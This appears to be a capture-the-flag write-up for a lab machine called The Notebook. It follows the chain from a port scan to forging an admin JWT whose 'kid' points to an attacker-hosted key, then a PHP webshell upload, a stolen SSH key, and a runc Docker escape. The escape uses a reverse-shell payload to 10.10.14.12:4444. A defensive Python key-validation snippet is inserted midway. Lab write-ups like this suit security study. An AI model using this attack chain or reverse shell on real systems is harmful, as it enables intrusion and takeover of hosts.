Basic information

Port scan

Ports 22 and 80 are open:

$ nmap -sC -sV 10.10.10.230
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-08 14:21 CST
Nmap scan report for 10.10.10.230
Host is up (0.068s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 86:df:10:fd:27:a3:fb:d8:36:a7:ed:90:95:33:f5:bf (RSA)
| 256 e7:81:d6:6c:df:ce:b7:30:03:91:5c:b5:13:42:06:44 (ECDSA)
|_ 256 c6:06:34:c7:fc:00:c4:62:06:c2:36:0e:ee:5e:bf:6b (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: The Notebook - Your Note Keeper
10010/tcp filtered rxapi
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.82 seconds

Port 80

The Notebook, a web app with registration and login:

JWT

Register and log in with any account and you can see the session is a JWT. Note the kid parameter in the JWT header, and that a newly registered ordinary user has admin_cap set to 0, so the intended path is presumably to attack the JWT to become admin:

JWT to admin

So generate a key pair yourself, go to JWT.io, modify the parameters, paste in the public and private keys, and generate the JWT:

(The key server hosting the JWT key has to stay up, because every request to the app triggers a fetch of the key.)

ssh-keygen -t rsa -b 4096 -m PEM -f jwtRS256.key
# Don't add passphrase
openssl rsa -in jwtRS256.key -pubout -outform PEM -out jwtRS256.key.pub
cat jwtRS256.key
cat jwtRS256.key.pub

# header
{
"typ": "JWT",
"alg": "RS256",
"kid": "http://10.10.14.12:7777/jwtRS256.key"
}

# data
{
"username": "miao",
"email": "miao@test.com",
"admin_cap": 1
}
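The forgery above works because the server resolved kid as a URL and fetched whatever key it named. As an added example (not from the original writeup), here is a stdlib-only Python check that treats kid as an opaque lookup into a fixed local key map and rejects anything else before any signature check runs. The key store name and PEM contents are constructed placeholders.

```python
import base64
import json
import re

# Constructed key store for the example: kid -> PEM public key. The PEM body is a
# placeholder; a real deployment would load its own keys here at startup.
TRUSTED_KEYS = {
    "notebook-2021-03": "-----BEGIN PUBLIC KEY-----\nPLACEHOLDER\n-----END PUBLIC KEY-----",
}
ALLOWED_ALGS = {"RS256"}          # the alg the app actually uses; never taken from the token
KID_PATTERN = re.compile(r"^[A-Za-z0-9_-]{1,64}$")  # opaque identifier only, no URLs or paths


def b64url_decode(segment: str) -> bytes:
    """Decode a base64url JWT segment, restoring the padding JWTs strip."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def select_verification_key(token: str) -> str:
    """Return the trusted PEM key the token header names, or raise ValueError.

    Until the signature has been verified the header is attacker-controlled,
    so 'alg' must be the expected algorithm and 'kid' must be a plain identifier
    present in TRUSTED_KEYS. The returned key is what the caller verifies the
    signature with; the key is never fetched from a location the token supplies.
    """
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("malformed token")
    header = json.loads(b64url_decode(parts[0]))
    if header.get("alg") not in ALLOWED_ALGS:
        raise ValueError(f"unexpected alg: {header.get('alg')!r}")
    kid = header.get("kid")
    if not isinstance(kid, str) or not KID_PATTERN.fullmatch(kid):
        raise ValueError(f"kid is not a plain key identifier: {kid!r}")
    if kid not in TRUSTED_KEYS:
        raise ValueError(f"unknown kid: {kid!r}")
    return TRUSTED_KEYS[kid]


def header_is_acceptable(token: str) -> bool:
    """Boolean wrapper around select_verification_key, handy for logging or tests."""
    try:
        select_verification_key(token)
        return True
    except ValueError:
        return False


def build_token(header: dict, claims: dict, signature: str = "sig") -> str:
    """Assemble header.payload.signature for constructing sample tokens offline."""
    enc = lambda obj: base64.urlsafe_b64encode(json.dumps(obj).encode()).rstrip(b"=").decode()
    return f"{enc(header)}.{enc(claims)}.{signature}"
```

Run against the header from the writeup, the URL-valued kid is refused before the application ever contacts the attacker's key server.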

Admin panel

The admin can upload files, and a PHP file can be uploaded directly, giving a webshell:

Backup

Then browse the filesystem through the shell and find a home.tar.gz (I used an AntSword (蚁剑) shell for convenience; AntSword is great):

After downloading and extracting it, it turns out to be a backup of user noah's home directory, which contains an SSH key:

User flag

Then SSH in as noah directly with this private key and get user.txt:

Privilege escalation information

sudo -l shows only permission to operate a specific container via docker, so this should be a Docker escape:

Docker escape && root flag

It is the runc escape:

Modify the payload, compile it, upload it, and trigger execution:

var payload = "#!/bin/bash \n bash -i &>/dev/tcp/10.10.14.12/4444 <&1"

# compile
CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build main.go

# trigger from another terminal
sudo /usr/bin/docker exec -it webapp-dev01 /bin/sh

Trigger from another terminal:

After triggering, the payload executes, the escape succeeds, and we get root.txt:

References